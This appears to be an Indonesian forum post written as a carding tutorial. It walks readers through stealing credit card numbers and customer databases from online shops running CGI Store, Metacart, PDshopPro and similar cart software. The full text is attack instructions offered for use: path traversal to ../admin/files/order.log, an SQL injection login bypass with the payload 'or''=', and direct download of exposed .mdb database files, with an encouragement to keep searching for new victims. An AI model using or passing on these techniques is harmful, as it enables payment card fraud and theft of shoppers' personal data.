CGI Store Log
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1.
[You must be registered and logged in to see this link.]2. Kemudian hapus/delete Repair_Manuals.htm di url/browsing sehingga menjadi
[You must be registered and logged in to see this link.]3. Masukkan file ini di belakang situs tadi :
../admin/files/order.log
Misal nya
[You must be registered and logged in to see this link.]4. Maka yang keluar di situs itu adalah nomor CC (credit card).
Admin Take Over
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1.
[You must be registered and logged in to see this link.]2. Langkah selanjutnya gunakan teknik SQL Injection
user : ‘or”=’
pass : ‘or”=’
3. Trus kamu buka file2 yang ada disana satu persatu. Dapat deh……. CC yg kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik. Tapi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. Coba cari lagi target lain.
Database Downloadable
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1.
[You must be registered and logged in to see this link.]2. Kemudian hapus/delete shopadmin.asp di url/browsing sehingga menjadi
[You must be registered and logged in to see this link.]3. Masukkan file ini di belakang situs tadi :
shopdbtest.asp
Misal nya
[You must be registered and logged in to see this link.]4. Trus lihat apa nama databasenya dan letaknya pada : xDatabase dan xDblocation
contoh :
xDatabase : shopping300
xDatabase :../../../../www/youngsliquors/5498761211
5. Skrg utk mendownload file shopping300 dapat dilakukan dgn merubah url/browsing nya menjadi :
[You must be registered and logged in to see this link.]6. Kalo sudah di download, buka file shopping300.mdb dgn Microsoft Access.
Metacart
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1.
[You must be registered and logged in to see this link.]2. Kemudian hapus/delete moreinfo.asp di url/browsing sehingga menjadi
[You must be registered and logged in to see this link.]3. Masukkan file ini di belakang situs tadi :
database/metacart.mdb
Misal nya
[You must be registered and logged in to see this link.]6. Kalo sudah di download, buka file metacart.mdb dgn Microsoft Access.
PDshopPro Shopping Cart
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1.
[You must be registered and logged in to see this link.]2. Kemudian hapus/delete shop/category.asp?catid=4 di url/browsing sehingga menjadi
[You must be registered and logged in to see this link.]3. Masukkan file ini di belakang situs tadi :
admin/dbsetup.asp
Misal nya
[You must be registered and logged in to see this link.]4. Maka yang keluar di situs target adalah :
Your Database Type :
Microsoft Access
Your Connection String :
Driver={Microsoft Access Driver (*.mdb)}; DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb;
Current Status :
Connection to Database OK.
Database Primary ‘setup’ Table Found!
Database permissions OK!
5. Skrg utk mendownload file pdshoppro.mdb dapat dilakukan dgn merubah url/browsing nya menjadi :
[You must be registered and logged in to see this link.]6. Kalo sudah di download, buka file pdshoppro.mdb dgn Microsoft Access.